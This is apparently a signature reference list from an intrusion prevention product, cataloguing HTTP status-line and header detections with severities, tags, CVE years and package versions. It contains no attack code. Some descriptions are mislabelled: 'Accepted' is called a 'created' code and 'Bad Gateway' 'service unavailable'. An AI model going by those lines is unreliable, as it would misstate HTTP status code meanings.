Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Attack Related Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-793-5211
Last changed: sgpkg-ips-1174-5242
Description:
Back to top

HTTP_SHS-Windows-Helpctr-Exe-Hcp-Url-System-Compromise

About this situation: Detects links to vulnerable Windows HCP services
Context: HTTP Server Header Stream
Severity: 7
Tags: Windows XP, Any Hardware, Microsoft Help and Support Center, CVE2004, Windows XP not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Windows-Helpctr-Exe-Hcp-Url-System-Compromise
Description:
Back to top

HTTP_SHS-X-Php-Originating-Script-Header

About this situation: X-PHP-Originating-Script HTTP header detected
Context: HTTP Reply Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Description:
Back to top

HTTP_SHS-Your-Freedom-Network-Response

About this situation: Detected a HTTP response from Your Freedom network
Context: HTTP Server Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Your Freedom, Any Operating System not specific, Tunneling Protocols
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Your-Freedom-Network-Usage
Description:
Back to top

HTTP_SHS_Squid-Proxy-Digest-Nonce-Information-Disclosure

About this situation: A vulnerability in Squid Project Squid
Context: HTTP Reply Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1208-5242
Last changed: sgpkg-ips-1208-5242
Vulnerability: Squid-Proxy-Digest-Nonce-Information-Disclosure
Description:
Back to top

HTTP_SLS-426-Upgrade-Required

About this situation: Detected a HTTP 426 response code
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-563-5211
Description:
Back to top

HTTP_SLS-Accepted-Status-Code

About this situation: Detected an created status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Already-Reported-Status-Code

About this situation: Detected an already reported status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-493-5211
Description:
Back to top

HTTP_SLS-Already-Reported-Status-Code-In-HTTP-1.0-Response

About this situation: Detected an already reported status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-493-5211
Description:
Back to top

HTTP_SLS-Apple-QuickTime-Crafted-HTTP-Error-Response-Buffer-Overflow

About this situation: Detected an attempt to exploit a vulnerability in Apple QuickTime
Context: HTTP Status Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-157-2032
Last changed: sgpkg-ips-404-4219
Vulnerability: Apple-QuickTime-Crafted-HTTP-Error-Response-Buffer-Overflow
Description:
Back to top

HTTP_SLS-Bad-Gateway-Status-Code

About this situation: Detected a service unavailable status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Bad-Request-Status-Code

About this situation: Detected a bad request status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Conflict-Status-Code

About this situation: Detected a conflict status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Conflict-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a conflict status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Continue-Status-Code

About this situation: Detected an continue status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-1105-5242
Description:
Back to top

HTTP_SLS-Continue-Status-Code-In-HTTP-1.0-Response

About this situation: Detected an continue status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1105-5242
Description:
Back to top

HTTP_SLS-Created-Status-Code

About this situation: Detected an created status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Embedthis-GoAhead-Web-Server-File-Upload-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in EmbedThis GoAhead detected
Context: HTTP Status Line
Severity: 7
Tags: Any Operating System, Any Hardware, EmbedThis GoAhead, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1243-5242
Vulnerability: Embedthis-GoAhead-Web-Server-File-Upload-Denial-Of-Service
Description:
Back to top

HTTP_SLS-Entity-Too-Large-Status-Code

About this situation: Detected a request entity too large status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Entity-Too-Large-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a request entity too large status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Expectation-Failed-Status-Code

About this situation: Detected an expectation failed status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Expectation-Failed-Status-Code-In-HTTP-1.0-Response

About this situation: Detected an expectation failed status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Failed-Dependency-Status-Code

About this situation: Detected a locked entity status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Failed-Dependency-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a locked entity status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Forbidden-Status-Code

About this situation: Detected a forbidden status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-988-5242
Description:
Back to top

HTTP_SLS-Gateway-Timeout-Status-Code

About this situation: Detected a gateway timeout status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Gateway-Timeout-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a gateway timeout status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-GetGo-Download-Manager-HTTP-Response-Buffer-Overflow

About this situation: An attempt to exploit a GetGo Download Manager HTTP Response Buffer Overflow vulnerability detected.
Context: HTTP Status Line
Severity: 7
Tags: Windows, Any Hardware, GetGo, CVE2014, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-779-5211
Last changed: sgpkg-ips-1225-5242
Vulnerability: GetGo-Download-Manager-HTTP-Response-Buffer-Overflow
Description:
Back to top

HTTP_SLS-Gone-Status-Code

About this situation: Detected a gone status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Gone-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a gone status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Header-In-Status-Line

About this situation: Detected a HTTP header line in the status line
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-797-5211
Description:
Back to top

HTTP_SLS-HTTP-0.9-Response-After-HTTP-1.x

About this situation: The server response used a different protocol version from the request
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-1523-5242
Description:
Back to top

HTTP_SLS-HTTP-Version-Not-Supported-Status-Code

About this situation: Detected a HTTP version not supported status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-HTTP-Version-Not-Supported-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a HTTP version not supported status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Informal-Status-With-HTTP-Version-1.0

About this situation: Detected an informal class status in HTTP version 1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-201-2032
Description:
Back to top

HTTP_SLS-Insufficient-Storage-Status-Code

About this situation: Detected an insufficient storage status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Insufficient-Storage-Status-Code-In-HTTP-1.0-Response

About this situation: Detected an insufficient storage status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Internal-Error-Status-Code

About this situation: Detected an internal error status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Invalid-Status-Line

About this situation: The server responded with an invalid status line
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-1110-5242
Description:
Back to top

HTTP_SLS-Length-Required-Status-Code

About this situation: Detected a lenght required status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Length-Required-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a lenght required status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Locked-Status-Code

About this situation: Detected a locked entity status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Locked-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a locked entity status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Loop-Detected-Status-Code

About this situation: Detected a loop detected status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-493-5211
Description:
Back to top

HTTP_SLS-Loop-Detected-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a loop detected status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-493-5211
Description:
Back to top

HTTP_SLS-Method-Not-Allowed-Status-Code

About this situation: Detected a method not allowed status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Method-Not-Allowed-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a method not allowed status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Microsoft-Internet-Explorer-HTTP-Response-Double-Free-Memory-Corruption

About this situation: Detected an attempt to exploit double free vulnerability in Microsoft Internet Explorer
Context: HTTP Status Line
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-08, CVE2008, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-162-2032
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Internet-Explorer-HTTP-Response-Double-Free-Memory-Corruption
Description:
Back to top

HTTP_SLS-Microsoft-Lync-Insecure-Library-Loading-CVE-2012-1849

About this situation: Detected attempt to exploit a vulnerability in Microsoft Lync
Context: HTTP Status Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Lync, MS2012-06, CVE2012, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-457-5211
Last changed: sgpkg-ips-811-5242
Vulnerability: Microsoft-Lync-Insecure-Library-Loading-CVE-2012-1849
Description:
Back to top

HTTP_SLS-Moved-Permanently-Status-Code

About this situation: Detected a moved permanently status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-1697-5242
Description:
Back to top

HTTP_SLS-Moved-Temporarily-Status-Code

About this situation: Detected a moved temporarily status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-1000-5242
Description:
Back to top

HTTP_SLS-Multi-Status-Code

About this situation: Detected a multi status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Multi-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a multi status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Multiple-Choices-Status-Code

About this situation: Detected a multiple choices status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-No-Content-Status-Code

About this situation: Detected a no content information status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Non-Authoritative-Information-Status-Code

About this situation: Detected a non-authoritative information status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Non-Authoritative-Information-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a non-authoritative information status code in HTTP version 1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Not-Acceptable-Status-Code

About this situation: Detected a not acceptable status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Not-Acceptable-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a not acceptable status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Not-Found-Status-Code

About this situation: Detected a not found status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-903-5242
Description:
Back to top

HTTP_SLS-Not-Implemented-Status-Code

About this situation: Detected a not implemented status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Not-Modified-Status-Code

About this situation: Detected a not modified status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-901-5242
Description:
Back to top

HTTP_SLS-Octopus-C2-Infection-Traffic

About this situation: Octopus C2 framework infection traffic was detected
Context: HTTP Status Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1272-5242
Last changed: sgpkg-ips-1782-5242
Vulnerability: Octopus-C2-Infection-Traffic
Description:
Back to top

HTTP_SLS-Partial-Content-Status-Code

About this situation: Detected a partial content information status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-591-5211
Description:
Back to top

HTTP_SLS-Permanent-Redirect-Status-Code

About this situation: Detected a permanent redirect status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-1078-5242
Last changed: sgpkg-ips-1078-5242
Description:
Back to top

HTTP_SLS-Precondition-Failed-Status-Code

About this situation: Detected a precondition failed status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Precondition-Failed-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a precondition failed status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Processing-Status-Code

About this situation: Detected a processing status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Processing-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a processing status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Proxy-Authentication-Required-Status-Code

About this situation: Detected a proxy authentication required status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Proxy-Authentication-Required-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a proxy authentication required status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Request-Timeout-Status-Code

About this situation: Detected a request timeout status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-1243-5242
Description:
Back to top

HTTP_SLS-Request-Timeout-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a request timeout status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Requested-Range-Not-Satisfiable-Status-Code

About this situation: Detected a requested range not satisfiable status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Requested-Range-Not-Satisfiable-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a requested range not satisfiable status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Reset-Content-Status-Code

About this situation: Detected a reset content information status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Reset-Content-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a reset content information status code in HTTP version 1.0 response
Context: HTTP Status Line
Severity: 2
